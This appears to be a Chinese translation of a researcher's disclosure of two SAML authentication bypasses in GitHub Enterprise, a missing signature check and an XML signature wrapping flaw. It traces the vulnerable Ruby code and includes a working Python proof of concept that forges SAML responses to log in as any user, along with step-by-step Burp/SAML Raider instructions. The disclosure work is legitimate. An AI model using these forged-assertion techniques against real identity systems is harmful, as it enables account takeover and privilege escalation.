Github Enterprise版本SAML服务两个身份认证漏洞

漏洞介绍

Github Enterprise版本可以配置使用SAML来进行身份验证。有关SAML身份验证的简短介绍，可以查看以前的文章或以下任何内容：wikipedia,onelogin sam tutorial,auth0 saml how-to.

自从听说Github企业版支持SAML身份验证之后，就把挖掘他的SAML漏洞记在了心里。不过因为是Github，所以我没想到能在这上面发现一些重要的漏洞，就慢慢忘记了这件事情。就在今年一月，orange tsai发布了他们在Github企业版本中挖掘到的SQL注入漏洞报告，并且Github的安全部门宣布他们会在一月和二月报告的漏洞中会给出一些奖金。Orange的报告让我认为Github可能存在一定的漏洞。并且奖金的激励也有帮助于发现了这两个漏洞。 接下来就是这两个漏洞的主要内容，希望读者能着重阅读漏洞发现的过程，而不是只说666…

搭建实验环境

由于没有详细正确的阅读Github给的说明文档，我不知道如何在Github去申请测试许可，所以就直接去注册了一下正常的商业版本试用。

首先，下载qcow2镜像，通过VM打开，设置为2个cpu，4G内存。

访问 https://192.168.122.244:8443/setup，跟着导航安装结束之后，收到下面的信息提示需要至少14GB内存来引导安装。

考虑到测试SAML实现不需要所有的这些内存，所以要想办法绕过安装限制。通过搜索如果挂载和编辑qcow2镜像，我找到了libguestfs和guestfish.通过guestsfish挂载成功后，通过搜索'preflight',很幸运的找到了配置文件/usr/local/share/enterprise/ghe-preflight-check,所以我们更改:

CHECK_REQUIREMENTS = {
   default: {memory: 14, blockdev_capacity: 10, rootdev_capacity: 20},
 }

到:

CHECK_REQUIREMENTS = {
  default: {memory: 3, blockdev_capacity: 10, rootdev_capacity: 20},
 }

修改之后，我们就可以顺利地安装这个镜像了。

获取SAML实现源码

通过阅读orange提供的write-up，我接下来通过scp把/data/Github/current这里面的东西下载到本地。使用下面脚本：

require 'zlib'
 require 'fileutils'
 
 def decrypt(s)
     key = "This obfuscation is intended to discourage Github Enterprise customers from making modifications to the VM. We know this 'encryption' is easily broken. "
     i, plaintext = 0, ''
     Zlib::Inflate.inflate(s).each_byte do |c|
         plaintext << (c ^ key[i%key.length].ord).chr
         i += 1
     end
     plaintext
 end
 content = File.open(ARGV[0], "r").read
 filename = './decrypted_source/'+ARGV[0]
 if content.include? "ruby_concealer.so"
     content.sub! %Q(require "ruby_concealer.so"n__ruby_concealer__), " decrypt "
     plaintext = eval content
 
     dirname = File.dirname('./decrypted_source/'+ARGV[0])
     unless File.directory?(dirname)
           FileUtils.mkdir_p(dirname)
     end
 else
     plaintext = content
 end
 
 open(filename,'w') { |f|
     f.puts plaintext
 }

然后执行一下命令将ruby文件进行去混淆：

find . -iname '*.rb' -exec ruby decrypt.rb '{}' ;

验证VM工作正常

根据文档说明很容易就可以启动以及设置好SAML身份验证。对于身份提供部分：使用了基于pysaml2的python项目，这个项目可以处理合法的IdP功能以及一些自动化和半自动化的SAML相关攻击。创建了一个虚拟的Idp证书：

openssl req -nodes -x509 -newkey rsa:2048 -keyout idp.key -out idp.crt -days 3650

并且，将我的发行者设置为：https://idp.ikakavas.gr,将认证端点设置为：https://idp.ikakavas.gr/sso/redirect.并且，在域中不需要设置很详细。由于所有的通信都是通过用户浏览器的前通道，所以我们只需要在'/etc/hosts'指向localhost就足够完成这次测试。我以下面的形式来对我的身份提供者进行设置:urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified。这样我们已经准备好进行测试了。

先做了一个测试认证，用登录user1作为SAML机制中的NAMEID，并且一切正常工作。用户是我在Github Enterprise 实例中创建的，并且能够成功登录。

下面是一般SAML WEB浏览器登录流程：

ghe3

1. 用户访问： https://192.168.122.244
2. 由于启用了SAML身份验证，并且对Web界面的访问受到保护，GHE SAML SP构建了一个身份验证请求，并将用户重定向到IdP身份验证端点，身份验证请求结束并且将请求编码为HTTP GET参数.
3. Idp身份验证端点处理这一登录请求，如果它“知道”发出请求的用户，那么继续执行。反之，返回登录错误。
4. Idp成功认证后，构造包含认证语句以及SAMLResponse，并指示用户浏览器将其发布到GHE SAML SP的使用服务端点。
5. SAML响应的真实性以及有效性得到验证。用户从SAML断言信息的NAMEID中获取，并且SAML为用户创建session。
6. Cookie已经设置成功，同时作为已经认证的用户重定向返回https://192.168.122.244

实现攻击SMAL SP

签名分离

概述

我尝试的第一件事情是禁止SAML签名响应，以及禁止身份提供者发送SMAL声明到GHE服务提供者。

如果无法执行上面的SAML内容，相当于接受未签名的SAML断言的服务提供者接受用户名而不检查密码。如果上述流程有效，则在步骤5，GHE SAMLSP接受SAML断言只是检查它是良好的形式和有效，而不检查它的真实性。

所以，在30分钟内，我找到了一个非常严重的漏洞，导致产生了以下的影响:

• 外部或者内部的攻击者可以登录任意用户。
• 外部或者内部的攻击者可以建立任意用户，甚至提升权限，设置管理员属性
• 内部用户可以通过设置administrator属性，提升权限。

签名认证在SAML SSO中是非常重要的一部分，这里确没有进行验证，下面内容就是这个漏洞的详细分析。

漏洞详情

通过执行几个grep Saml命令后，我发现SAML文件包含在/data/Github/current/lib/saml文件夹中。 Ruby不是我的强项，但是源码看起来很直观。在执行几个'grep signature'后，让我比之前更困惑。因为我看到有源码处理签名认证。

处理传入SAML响应的验证函数是/data/Github/current/lib/Github/authentication/saml.rb，这个脚本是用来处理到断言服务端点的HTTP POST请求。主要出现在get_auth_failure_result的方法中。源码如下：

def get_auth_failure_result(saml_response, request, log_data)
   unless saml_response.in_response_to || idp_initiated_sso? || ::SAML.mocked[:skip_in_response_to_check]
     return Github::Authentication::Result.external_response_ignored
   end
   unless saml_response.valid?(
     :issuer => configuration[:issuer],
     :idp_certificate => idp_certificate,
     :sp_url => configuration[:sp_url]
   )
     log_auth_validation_event(log_data, "failure - Invalid SAML response", saml_response, request.params)
     return Github::Authentication::Result.failure :message => INVALID_RESPONSE
   end
 
   if saml_response.request_denied?
     log_auth_validation_event(log_data, "failure - RequestDenied", saml_response, request.params)
     return Github::Authentication::Result.failure :message => saml_response.status_message || REQUEST_DENIED_RESPONSE
   end
 
   unless saml_response.success?
     log_auth_validation_event(log_data, "failure - Unauthorized", saml_response, request.params)
     return Github::Authentication::Result.failure :message => UNAUTHORIZED_RESPONSE
   end
 
   if request_tracking? && !in_response_to_request?(saml_response, request)
     log_auth_validation_event(log_data, "failure - Unauthorized - In Response To invalid", saml_response, request.params)
     return Github::Authentication::Result.failure :message => UNAUTHORIZED_RESPONSE
   end
 end

当valisd?函数被调用时，就开始变得有趣了：

unless saml_response.valid?(   :issuer => configuration[:issuer],   :idp_certificate => idp_certificate,   :sp_url => configuration[:sp_url] )   log_auth_validation_event(log_data, "failure - Invalid SAML response", saml_response, request.params)   return Github::Authentication::Result.failure :message => INVALID_RESPONSE end
saml_response 中的valid?方法实际上是从Message class(/lib/saml/message.rb)调用的:
# Public: Validates schema and custom validations. # # Returns false if instance is invalid. #errors will be non-empty if # invalid. def valid?(options = {})   errors.clear   validate_schema && validate(options)   errors.empty? end

并且上面调用的validate方法在Response类中实现，该类在/data/Github/current/lib/saml/message/response.rb中实现:

def validate(options)
     if !SAML.mocked[:skip_validate_signature] && options[:idp_certificate]
       validate_has_signature
       validate_signatures(options[:idp_certificate])
     end
     validate_issuer(options[:issuer])
     validate_destination(options[:sp_url])
     validate_recipient(options[:sp_url])
     validate_conditions
     validate_audience(options[:sp_url])
     validate_name_id_format(options[:name_id_format])
 end

到了这里，我没有在继续寻找validate_has_signature还有validate_signatures，以及他们是不是已经执行了。SAML.mocked`必须在某处设置成true，不过这一变化将导致这一漏洞似乎不可能。所以，我确信idp_certicate已经被设置了，因为如果不设置这个值的话，无法完成对SAML服务的配置。

唯一再进一步的方法就是调试函数。在ruby或者unicom语句中添加：put,pp语句也许是最简单的方式了。 所以，我用去混淆的脚本(/data/Github/current/lib/saml/message/response.rb)对混淆的代码进行带换。带换内容如下：

def validate(options)
     pp options
     if !SAML.mocked[:skip_validate_signature] && options[:idp_certificate]
       puts 'Going to validate the signature'
       validate_has_signature
       validate_signatures(options[:idp_certificate])
     end
 ...

接下来，我就可以找到是什么来运行ruby程序，进而找到我们应该去分析哪一个日志文件。 我开始通过观察什么应用侦听在443端口，发现是haproxy通过nginx转发到unicom。通过执行systemctl list-units命令我发现服务进程名字为：'Github-unicom'，运行文件为：data/Github/current/config/unicorn.rb，对应的日志文件为：“/var/log/Github/unicom.log” 有了上面的积累，我重新启动服务，执行身份验证，并查看日志以查看发生了什么，并看到以下内容：

{:issuer=>"https://idp.ikakavas.gr",
  :idp_certificate=>nil,
  :sp_url=>"https://192.168.122.244"}

由于:idp_certificate 是nil，所以证明了!SAML.mocked[:skip_validate_signature] && options[:idp_certificate]为假，进而证明了" validate_has_signature "和"validate_signatures"实际上在验证签名有效性的方面从来没有起作用，

我们深入到漏洞的根源，并且发现准确实际的错误，找到了这个漏洞函数被调用的脚本(

/data/Github/current/lib/Github/authentication/saml.rb )：
unless saml_response.valid?(   :issuer => configuration[:issuer],   :idp_certificate => idp_certificate,   :sp_url => configuration[:sp_url] )

idp_certificate函数为：

# Public: Returns a string containing the IdP certificate or nil.
  def idp_certificate
    @idp_certificate ||= if configuration[:idp_certificate]
      configuration[:idp_certificate]
    elsif configuration[:idp_certificate_path]
      File.read(configuration[:idp_certificate_path])
    end
  end

我一直观察它的运行，不过没有任何东西关闭。我没有发现任何错误。所以，我重新启动，几分钟过后，观察他的配置文件：

{:sso_url=>"http://idp.ikakavas.gr/sso",
  :idp_initiated_sso=>false,
  :disable_admin_demote=>false,
  :issuer=>"https://idp.ikakavas.gr",
  :signature_method=>"http://www.w3.org/2001/04/xmldsig-more#rsa-sha256",
  :digest_method=>"http://www.w3.org/2000/09/xmldsig#sha1",
  :idp_certificate_file=>"/data/user/common/idp.crt",
  :sp_pkcs12_file=>"/data/user/common/saml-sp.p12",
  :admin=>nil,
  :profile_name=>nil,
  :profile_mail=>nil,
  :profile_key=>nil,
  :profile_gpg_key=>nil,
  :sp_url=>"https://192.168.122.244"}

发现这个漏洞在我面前呈现出来。这是相对于第二个来说比较简单的一个漏洞。

在配置文件中，调用了一个idp_certificate_file函数，同时/data/Github/current/lib/Github/authentication/saml.rb试图获取idp_certificate_path.这一函数返回nill,并且也禁止了SAML对消息完整性和真实性的所有保护。

Poc

import requests, urllib, zlib, base64, re, datetime, pprint
 from urlparse import parse_qs
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 
 # Change this to reflect your GHE setup
 URL ='https://192.168.122.244/login?return_to=https%3A%2F%2F192.168.122.244%2F'
 ISSUER = 'https://idp.ikakavas.gr'
 RECIPIENT = 'https://192.168.122.244/saml/consume'
 AUDIENCE = 'https://192.168.122.244'
 # user to impersonate
 NAMEID = 'testuser'
 
 # Get a client that can handle cookies
 saml_client = requests.session()
 # Make the initial request to trigger the authentication middleware
 # Disallow redirects as we need to catch the Location header and parse it
 response = saml_client.get(URL, verify=False, allow_redirects=False)
 idp_login_url = response.headers['Location']
 # Get the HTTP GET parameters as a dict
 saml_message = (dict([(k, v[0]) for k, v in parse_qs(idp_login_url.split("?")[1]).items()]))
 if 'SAMLRequest' in saml_message and 'RelayState' in saml_message:
     relay_state = saml_message['RelayState']
     encoded_saml_request = saml_message['SAMLRequest']
     # inflate and decode the request
     saml_request = zlib.decompress(urllib.unquote(base64.b64decode(encoded_saml_request)), -15)
     # get the AuthnRequest ID so that we can reply
     to_reply_to = re.search(r'ID="([_A-Za-z0-9]*)"', saml_request, re.M|re.I).group(1)
 
     now = '{0}Z'.format(datetime.datetime.utcnow().isoformat().split('.')[0])
     not_after = '{0}Z'.format((datetime.datetime.utcnow()+ datetime.timedelta(minutes = 20)).isoformat().split('.')[0])
     #Now load a dummy SAML Response from file and manipulate necessary fields
     saml_response ='''<?xml version="1.0" encoding="UTF-8"?>
 <ns0:Response Destination="{5}"
   ID="id-ijkXTw5GmzOJrShaq"
   InResponseTo="{0}"
   IssueInstant="{1}" Version="2.0"
   xmlns:ns0="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:ns1="urn:oasis:names:tc:SAML:2.0:assertion">
   <ns1:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">https://idp.ikakavas.gr</ns1:Issuer>
   <ns0:Status>
     <ns0:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
   </ns0:Status>
   <ns1:Assertion ID="id-MnRkvbCYnZ7YQ9vP5"
     IssueInstant="{1}" Version="2.0">
     <ns1:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">{2}</ns1:Issuer>
     <ns1:Subject>
       <ns1:NameID
         Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">{3}</ns1:NameID>
       <ns1:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
         <ns1:SubjectConfirmationData
           InResponseTo="{0}"
           NotOnOrAfter="{4}" Recipient="{5}"/>
       </ns1:SubjectConfirmation>
     </ns1:Subject>
     <ns1:Conditions NotBefore="{1}" NotOnOrAfter="{4}">
       <ns1:AudienceRestriction>
         <ns1:Audience>{6}</ns1:Audience>
       </ns1:AudienceRestriction>
     </ns1:Conditions>
     <ns1:AuthnStatement AuthnInstant="{1}" SessionIndex="id-bBMbAuaPOePnBgNTx">
       <ns1:AuthnContext>
         <ns1:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</ns1:AuthnContextClassRef>
       </ns1:AuthnContext>
     </ns1:AuthnStatement>
   </ns1:Assertion>
 </ns0:Response>'''.format(to_reply_to, now, ISSUER, NAMEID, not_after, RECIPIENT, AUDIENCE)
     data = {'SAMLResponse': base64.b64encode(saml_response),
             'RelayState':relay_state}
     #Post the SAML Response to the ACS endpoint
     r = saml_client.post(RECIPIENT, data=data, verify=False, allow_redirects=False)
     # we expect a redirect on successful authentication
     if 300 < r.status_code < 399:
         # Print the cookies for verification
         pprint.pprint(r.cookies.get_dict())

执行完Poc之后会输出类似的东西：

{'_fi_sess': 'eyJsYXN0X3dyaXRlIjoxNDg0MDY0NjMxNzU3LCJmbGFzaCI6eyJkaXNjYXJkIjpbXSwiZmxhc2hlcyI6eyJhbmFseXRpY3NfZGltZW5zaW9uIjp7Im5hbWUiOiJkaW1lbnNpb241IiwidmFsdWUiOiJMb2dnZWQgSW4ifX19LCJzZXNzaW9uX2lkIjoiMzM2OGFiYmFjOGVjMWQxNGZiYjhmNDAzMGRiNWFkZGQifQ%3D%3D--c9219c7ba29e5285a76275c2a0a5dcbb12925fcb',
 '_gh_render': 'BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiRTZlMmNjZTBmN2RjMGM3MDExMGI3%0AMzVkMjcxYjZkOGY5MTQxMTE0Yzg2NDMwOGFkM2EzZDE5OTU1MjJiMTRkMGEG%0AOwBGSSIPdXNlcl9sb2dpbgY7AEZJIg10ZXN0dXNlcgY7AFQ%3D%0A--ae525ab90dee2157dec9890cdb147c569ff5e6b8',
 'dotcom_user': 'testuser',
 'logged_in': 'yes',
 'user_session': 'yoF_AlS0VMFsZjBzj8mLF9Wk_Ne1YpCv57y_T1rTy-FEfD_dWHUHd3pqz07hXxODk0hhms_8gVxICuBQ'}

将攻击得来的cookie设置到浏览器中，登录成功。

XML签名包装攻击

概要

第二个周末，我有更多的时间来从不同的方面来检测Github Enterprise的漏洞。我用在一篇文章里面介绍的所有攻击方法制作了一个检测框架，进行它的漏洞扫描。

运行这个检测框架，很快发现了SAML存在一个特殊的XML签名包装攻击(xsw)，是由验证签名部分和实现业务逻辑部分存在不同数据视图引发的。GHE SAML SP实施过程漏洞是由一个包含两条SAML信息的SAML响应触发的。假设合法的信息是LA,伪造的信息是：FA，并且LAS是合法信息的签名，恶意攻击的SAML响应如下：

<SAMLRespone>
   <FA ID="evil">
       <Subject>Attacker</Subject>
   </FA>
   <LA ID="legitimate">
       <Subject>Legitimate User</Subject>
       <LAS>
          <Reference Reference URI="legitimate">
          </Reference>
       </LAS>
   </LA>
 </SAMLResponse>

所以当接收到这样一条SAML响应时，即使FA没有签名，GHE会成功验证，并且为攻击者建立一个合法的Session，而不是为合法用户创建。

漏洞详情

让我们看看为什么GHE这么容易被攻击，我们采取前面的方式，看他去混淆的代码.

最根本的问题是响应处理时，默认会认为SAML响应里面只会有一条消息。

位于/data/Github/current/lib/Github/authentication/saml.rb是用来认证传入过来的SAML响应,:

def rails_authenticate(request)

传入的SAML信息是用来创建*SAML::Message::Response实例。

saml_response = ::SAML::Message::Response.from_param(request.params[:SAMLResponse])

函数位于/data/Github/current/lib/saml/message.rb的from_param函数是用来将对响应进行base64解码，然后继续调用build函数，继续调用位于/data/Github/current/lib/saml/message/response.rb的parse方法。其中，parse()中广泛使用了at_xpath方法，以便在SAML响应中以便找到指定的XPATH，并且把节点的内容赋值给一个变量。

这是漏洞的第一部分，也就是如何在业务逻辑上面获得SAML的响应。由于at_xpath和at方法不管是有多少结果在，它们都是匹配和检索第一个结果。以下变量都是伪造的声明。

issuer = d.at_xpath("//Response/Issuer") && d.at_xpath("//Response/Issuer").text
 issuer ||= d.at_xpath("//Response/Assertion/Issuer") && d.at_xpath("//Response/Assertion/Issuer").text
 status_code = d.at_xpath("//Response/Status/StatusCode")
 second_level_status_code = d.at_xpath("//Response/Status/StatusCode/StatusCode")
 status_message = d.at_xpath("//Response/Status/StatusMessage")
 authn = d.at_xpath("//AuthnStatement")
 conditions = d.at_xpath("//Response/Assertion/Conditions")
 audience_text = d.at_xpath("//Response/Assertion/Conditions/AudienceRestriction") && d.at_xpath("//Response/Assertion/Conditions/AudienceRestriction/Audience") && d.at_xpath("//Response/Assertion/Conditions/AudienceRestriction/Audience").text
 attribute_statements = d.at_xpath("//Response/Assertion/AttributeStatement")
 subject = d.at_xpath("//Subject") && d.at_xpath("//Subject").text
 name_id = d.at_xpath("//Subject/NameID") && d.at_xpath("//Subject/NameID").text
 name_id_format = d.at_xpath("//Subject/NameID") && d.at_xpath("//Subject/NameID")["Format"]
 subj_conf_data = d.at_xpath("//Subject/SubjectConfirmation") && d.at_xpath("//Subject/SubjectConfirmation/SubjectConfirmationData")

现在响应的对象已经产生，get_auth_failure_result(saml_response, request, log_data)

unless saml_response.valid?(
   :issuer => configuration[:issuer],
   :idp_certificate => idp_certificate,
   :sp_url => configuration[:sp_url]
 )
   log_auth_validation_event(log_data, "failure - Invalid SAML response", saml_response, request.params)
   return Github::Authentication::Result.failure :message => INVALID_RESPONSE
 end

同样，位于saml_response的valid?方法在实际上被调用：

# Public: Validates schema and custom validations.
 #
 # Returns false if instance is invalid. #errors will be non-empty if
 # invalid.
 def valid?(options = {})
   errors.clear
   validate_schema && validate(options)
   errors.empty?
 end

valid?方法中的validate（位于/data/Github/current/lib/saml/message/response.rb）被调用：

def validate(options)
     if !SAML.mocked[:skip_validate_signature] && options[:idp_certificate]
       validate_has_signature
       validate_signatures(options[:idp_certificate])
     end
     validate_issuer(options[:issuer])
     validate_destination(options[:sp_url])
     validate_recipient(options[:sp_url])
     validate_conditions
     validate_audience(options[:sp_url])
     validate_name_id_format(options[:name_id_format])
 end

这就是漏洞的第二部分的主要的代码:签名验证逻辑，并且得到SAML响应。 其中的validate_has_signature如下：

def validate_has_signature
     namespaces = {
       "ds" => "http://www.w3.org/2000/09/xmldsig#",
       "saml2p" => "urn:oasis:names:tc:SAML:2.0:protocol",
       "saml2" => "urn:oasis:names:tc:SAML:2.0:assertion"
     }
     unless document.at("//saml2p:Response/ds:Signature", namespaces) ||
            document.at("//saml2p:Response/saml2:Assertion/ds:Signature", namespaces)
       self.errors << "Message is not signed. Either the assertion or response or both must be signed."
     end
   end

//saml2p:Response/saml2:Assertion/ds:Signature只是匹配了在处理过程中正确的部分，并且不在self.errors添加任何东西。

接下来，validate_signatures方法如下：

def validate_signatures(certificate)
     certificate = OpenSSL::X509::Certificate.new(certificate)
     unless signatures.all? { |signature| signature.valid?(certificate) }
       puts "digest mismatch"
       self.errors << "Digest mismatch"
     end
   end

它使用了来自/data/Github/current/lib/saml/message.rb的signatures:

def signatures
   signatures = document.xpath("//ds:Signature", Xmldsig::NAMESPACES)
   signatures.reverse.collect do |node|
     Xmldsig::Signature.new(node)
   end || []
 end

这个函数匹配了我们在伪造的SAML响应中签名，并且valid?函数成功从Xmldsig::Signature验证了对身份提供者的公钥，因为动作消息确实是来自合法的IDP。

我们回到 response.rb的validate函数，可以看到：

validate_issuer(options[:issuer])
 validate_destination(options[:sp_url])
 validate_recipient(options[:sp_url])
 validate_conditions
 validate_audience(options[:sp_url])
 validate_name_id_format(options[:name_id_format])

他会返回true，并且他们会处理伪造的消息，攻击者可以任意的操作这些变量。

PoC

由于我用的代码或者工具还没有发布出来，为了描述Poc让Github验证，所以我使用了SAML Raider复现整个攻击过程。

1.   使用您喜欢的SAML身份提供者设置SAML身份验证的GHE。

2.   安装burp还有SAML Raider插件

3.   设置浏览器，使用burp代理

4.   开始登录GHE

5.   拦截SAML授权请求和转发

6.    使用合法的用户登录

7.    拦截SAML响应

8.    在SAML Raider窗口中，从可用的攻击中选择XSW3，然后单击"Apply XSW"

9.    检查下面的SAML响应，以查看它是否已更改，并将ID为evil_assertion_ID的中的名称更改为其他名称（即“victim_account”）

10.   单击Forward然后检查是不是以victim_accout进行登录的。

可利用性

如果下面3种情况之一，攻击者就可以进行身份验证绕过。

1.  攻击者是使用SAML身份验证的GHE实例的现有用户。
2.  攻击者是SAML身份提供者的现有可信用户。
3.  攻击者得到有效的SAML服务的签名信息。可以使任何使用SAML服务的应用（可以是身份服务提供商日志，其他服务提供商日志，或者StackOverflow的问题，等等）

注意，外部攻击者具有很大的困难，因为它们需要来自可信身份提供者的有效签名信息进行攻击。然而事实证明，签名泄漏可以显着提高机会。

影响

外部或内部攻击者可以进行任意用户登录
内部攻击者可以进行提升权限。